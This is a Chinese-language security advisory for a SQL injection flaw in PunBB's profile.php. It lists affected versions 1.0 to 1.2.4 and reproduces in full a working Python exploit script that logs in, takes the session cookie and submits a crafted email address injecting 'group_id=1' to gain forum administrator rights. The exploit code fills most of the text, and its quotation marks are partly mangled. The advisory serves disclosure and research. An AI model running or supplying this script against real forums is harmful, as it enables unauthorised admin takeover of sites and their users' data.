转 PunBB profile.php远程SQL注入漏洞 (Other,缺陷)

涉及程序： PunBB程序 描述： PunBB profile.php远程SQL注入漏洞 详细： PunBB是一款基于PHP的论坛程序。 PunBB中存在SQL注入漏洞，远程攻击者可能非法获取数据库的访问。 起因是在SQL查询中使用用户提供的输入前没有正确的通过profile.php脚本检查用户输入。攻击者可以利用这个漏洞获取对有漏洞论坛的管理访问。 <*来源：exploits@nopiracy.de （exploits@nopiracy.de） 链接：http://marc.theaimsgroup.com/?l=bugtraq&m=111306207306155&w=2 *> 受影响系统： PunBB PunBB 1.2.4 PunBB PunBB 1.2.3 PunBB PunBB 1.2.2 PunBB PunBB 1.2.1 PunBB PunBB 1.1.5 PunBB PunBB 1.1.4 PunBB PunBB 1.1.3 PunBB PunBB 1.1.2 PunBB PunBB 1.1.1 PunBB PunBB 1.1 PunBB PunBB 1.0.1 PunBB PunBB 1.0 攻击方法： 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ import urllib import getopt import sys import string __argv__ = sys.argv def banner(): print "PunBB 1.2.4 - change_email SQL injection exploit" print "Copyright (C) 2005 Hardened-PHP Project\n" def usage(): banner() print "Usage:\n" print " $ ./punbb_change_email.py [options]\n" print " -h http_url url of the punBB forum to exploit" print " f.e. http://www.forum.net/punBB/ print " -u username punBB forum useraccount" print " -p password punBB forum userpassword" print " -e email email address where the admin leve activation email \ is sent" print " -d domain catch all domain to catch \ \"some-SQL-Query\"@domain emails" print "" sys.exit(-1) def main(): try: opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:") except getopt.GetoptError: usage() if len(__argv__) < 10: usage() username = None password = None email = None domain = None host = None for o, arg in opts: if o == "-h": host = arg if o == "-u": username = arg if o == "-p": password = arg if o == "-e": email = arg if o == "-d": domain = arg # Printout banner banner() # Check if everything we need is there if host == None: print "[-] need a host to connect to" sys.exit(-1) if username == None: print "[-] username needed to continue" sys.exit(-1) if password == None: print "[-] password needed to continue" sys.exit(-1) if email == None: print "[-] email address needed to continue" sys.exit(-1) if domain == None: print "[-] catch all domain needed to continue" sys.exit(-1) # Retrive cookie params = { ';req_username'; : username, ';req_password'; : password, ';form_sent'; : 1 } wclient = urllib.URLopener() print "[+] Connecting to retrieve cookie" req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params)) info = req.info() if ';set-cookie'; not in info: print "[-] Unable to retrieve cookie... something is wrong" sys.exit(-3) cookie = info[';set-cookie';] cookie = cookie[:string.find(cookie, ';;';)] print "[+] Cookie found - extracting user_id" user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")] print "[+] User-ID: %d" % (int(user_id)) wclient.addheader(';Cookie';, cookie); email = ';"'; + email[:string.find(email, ';@';)] + ';"@'; + email[string.find(email, \ ';@';)+1:] + ';,"\';,'; append = ';group_id=\';1'; email = email + ( ((50-len(append))-len(email)) * '; '; ) + append + ';"@'; + domain params = { ';req_new_email'; : email, ';form_sent'; : 1 } print "[+] Connecting to request change email" req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, \ urllib.urlencode(params)) print "[+] Done... Now wait for the email. Log into punBB, go to the link in the \ email and become admin" if __name__ == "__main__": main() 解决方案： 厂商补丁： PunBB ----- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：